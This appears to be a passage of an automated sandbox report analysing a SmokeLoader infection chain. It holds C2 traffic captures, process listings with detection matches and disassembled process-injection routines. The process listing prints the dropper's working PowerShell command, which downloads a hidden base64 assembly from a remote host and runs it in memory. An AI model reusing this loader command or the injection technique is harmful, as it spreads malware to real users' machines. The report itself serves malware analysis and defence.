                                                                                                                                                    Jan 9, 2025 08:04:01.550983906 CET109OUTData Raw: 6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65 d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 f6 87 a1 2b 21 81 22 0e 03 a1 68 6d e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
                                                                                                                                                    Data Ascii: nIjcLQ%!GzeI67f+!"hm6hEv:RX;PLgjngaiF#Q 9
                                                                                                                                                    Jan 9, 2025 08:04:02.534200907 CET290INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Thu, 09 Jan 2025 07:04:02 GMT
                                                                                                                                                    Server: Apache/2.4.59 (Debian)
                                                                                                                                                    Content-Length: 115
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Raw: 6f 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f
                                                                                                                                                    Data Ascii: o_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJ


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    4192.168.2.74998846.173.214.14804056C:\Windows\explorer.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Jan 9, 2025 08:04:03.187640905 CET277OUTPOST /index.php HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://yilwfgipaws.com/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Length: 109
                                                                                                                                                    Host: prolinice.ga
                                                                                                                                                    Jan 9, 2025 08:04:03.187678099 CET109OUTData Raw: 6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65 d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 f6 87 a1 2b 21 81 22 0e 03 a1 68 6d e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
                                                                                                                                                    Data Ascii: nIjcLQ%!GzeI67f+!"hm6hEv:RX;PLgjngaiF#Q 9
                                                                                                                                                    Jan 9, 2025 08:04:04.159723043 CET290INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Thu, 09 Jan 2025 07:04:03 GMT
                                                                                                                                                    Server: Apache/2.4.59 (Debian)
                                                                                                                                                    Content-Length: 115
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Raw: 6f 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f
                                                                                                                                                    Data Ascii: o_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJ


                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:02:01:56
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs"
                                                                                                                                                    Imagebase:0x7ff7f76c0000
                                                                                                                                                    File size:170'496 bytes
                                                                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:02:01:56
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                                                                                                                                                    Imagebase:0x7ff741d30000
                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:02:01:56
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:11
                                                                                                                                                    Start time:02:02:19
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                    File size:56'368 bytes
                                                                                                                                                    MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:12
                                                                                                                                                    Start time:03:21:27
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                    Imagebase:0x7ff70ffd0000
                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    General

                                                                                                                                                    Target ID:13
                                                                                                                                                    Start time:03:21:48
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\uahuajd
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\uahuajd
                                                                                                                                                    Imagebase:0xf0000
                                                                                                                                                    File size:56'368 bytes
                                                                                                                                                    MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:14
                                                                                                                                                    Start time:03:21:48
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Imagebase:0xfa0000
                                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:15
                                                                                                                                                    Start time:03:21:49
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:16
                                                                                                                                                    Start time:03:21:49
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                                    Imagebase:0x7ff70ffd0000
                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:17
                                                                                                                                                    Start time:03:21:51
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Imagebase:0xfa0000
                                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:18
                                                                                                                                                    Start time:03:21:52
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Imagebase:0x7ff66f390000
                                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:false

                                                                                                                                                    General

                                                                                                                                                    Target ID:19
                                                                                                                                                    Start time:03:21:53
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                                    Imagebase:0x7ff70ffd0000
                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:20
                                                                                                                                                    Start time:03:21:54
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Imagebase:0xfa0000
                                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Has exited:false

                                                                                                                                                    General

                                                                                                                                                    Target ID:23
                                                                                                                                                    Start time:03:21:54
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2508 -s 696
                                                                                                                                                    Imagebase:0x7ff68d170000
                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:24
                                                                                                                                                    Start time:03:21:55
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                                    Imagebase:0x7ff70ffd0000
                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Has exited:false

                                                                                                                                                    General

                                                                                                                                                    Target ID:26
                                                                                                                                                    Start time:03:21:56
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Imagebase:0xfa0000
                                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:false

                                                                                                                                                    General

                                                                                                                                                    Target ID:27
                                                                                                                                                    Start time:03:21:57
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                                    Imagebase:0x7ff70ffd0000
                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:false

                                                                                                                                                    Disassembly

                                                                                                                                                    Reset < >

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:8%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:57.1%
                                                                                                                                                      Total number of Nodes:56
                                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                                      execution_graph 2135 402d65 2136 402d69 2135->2136 2137 4018a6 8 API calls 2136->2137 2138 402ea5 2136->2138 2137->2138 2213 4018b1 2214 401903 2213->2214 2216 4018b5 2213->2216 2215 4014bf 7 API calls 2214->2215 2218 40191a 2214->2218 2215->2218 2217 4018ee Sleep 2216->2217 2217->2214 2159 4014d6 2160 4014c4 2159->2160 2161 40168b 2160->2161 2162 40156f NtDuplicateObject 2160->2162 2162->2161 2163 40158c NtCreateSection 2162->2163 2164 4015b2 NtMapViewOfSection 2163->2164 2165 40160c NtCreateSection 2163->2165 2164->2165 2166 4015d5 NtMapViewOfSection 2164->2166 2165->2161 2167 401638 2165->2167 2166->2165 2168 4015f3 2166->2168 2167->2161 2169 401642 NtMapViewOfSection 2167->2169 2168->2165 2169->2161 2170 401669 NtMapViewOfSection 2169->2170 2170->2161 2131 402f5d 2132 4030b4 2131->2132 2133 402f87 2131->2133 2133->2132 2134 403042 RtlCreateUserThread NtTerminateProcess 2133->2134 2134->2132 2105 402dfe 2106 402dee 2105->2106 2108 402ea5 2106->2108 2109 4018a6 2106->2109 2110 4018b7 2109->2110 2111 4018ee Sleep 2110->2111 2112 401903 2111->2112 2114 40191a 2112->2114 2115 4014bf 2112->2115 2114->2108 2117 4014ce 2115->2117 2116 40168b 2116->2114 2117->2116 2118 40156f NtDuplicateObject 2117->2118 2118->2116 2119 40158c NtCreateSection 2118->2119 2120 4015b2 NtMapViewOfSection 2119->2120 2121 40160c NtCreateSection 2119->2121 2120->2121 2122 4015d5 NtMapViewOfSection 2120->2122 2121->2116 2123 401638 2121->2123 2122->2121 2124 4015f3 2122->2124 2123->2116 2125 401642 NtMapViewOfSection 2123->2125 2124->2121 2125->2116 2126 401669 NtMapViewOfSection 2125->2126 2126->2116 2219 4018be 2220 4018b7 2219->2220 2221 4018ee Sleep 2220->2221 2222 401903 2221->2222 2223 4014bf 7 API calls 2222->2223 2224 40191a 2222->2224 2223->2224 2127 4030bf 2128 403055 RtlCreateUserThread NtTerminateProcess 2127->2128 2130 4030d1 2127->2130 2129 4030b4 2128->2129 2130->2130

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 004014D6 Relevance: 10.8, APIs: 7, Instructions: 253nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 21 401540-401569 16->21 22 40184b 16->22 17->14 20 40185a-401883 17->20 30 401874-40187f 20->30 31 401886-4018a3 call 401164 20->31 21->22 29 40156f-401586 NtDuplicateObject 21->29 22->20 29->22 32 40158c-4015b0 NtCreateSection 29->32 30->31 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->22 38 401638-40163c 35->38 37->35 41 4015f3-401609 37->41 38->22 42 401642-401663 NtMapViewOfSection 38->42 41->35 42->22 44 401669-401685 NtMapViewOfSection 42->44 44->22 46 40168b call 401690 44->46
                                                                                                                                                      APIs
                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1652636561-0
                                                                                                                                                      • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                                                      • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                                                                                                                                      • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                                                      • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64
                                                                                                                                                      Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 68 401540-401569 63->68 69 40184b 63->69 64->61 67 40185a-401883 64->67 77 401874-40187f 67->77 78 401886-4018a3 call 401164 67->78 68->69 76 40156f-401586 NtDuplicateObject 68->76 69->67 76->69 79 40158c-4015b0 NtCreateSection 76->79 77->78 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->69 85 401638-40163c 82->85 84->82 88 4015f3-401609 84->88 85->69 89 401642-401663 NtMapViewOfSection 85->89 88->82 89->69 91 401669-401685 NtMapViewOfSection 89->91 91->69 93 40168b call 401690 91->93
                                                                                                                                                      APIs
                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                      • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                                                      • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                                                                                                                                      • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                                                      • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65
                                                                                                                                                      Function 004014E8 Relevance: 10.7, APIs: 7, Instructions: 168nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 111 401540-401569 106->111 112 40184b 106->112 107->104 110 40185a-401883 107->110 120 401874-40187f 110->120 121 401886-4018a3 call 401164 110->121 111->112 119 40156f-401586 NtDuplicateObject 111->119 112->110 119->112 122 40158c-4015b0 NtCreateSection 119->122 120->121 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->112 128 401638-40163c 125->128 127->125 131 4015f3-401609 127->131 128->112 132 401642-401663 NtMapViewOfSection 128->132 131->125 132->112 134 401669-401685 NtMapViewOfSection 132->134 134->112 136 40168b call 401690 134->136
                                                                                                                                                      APIs
                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
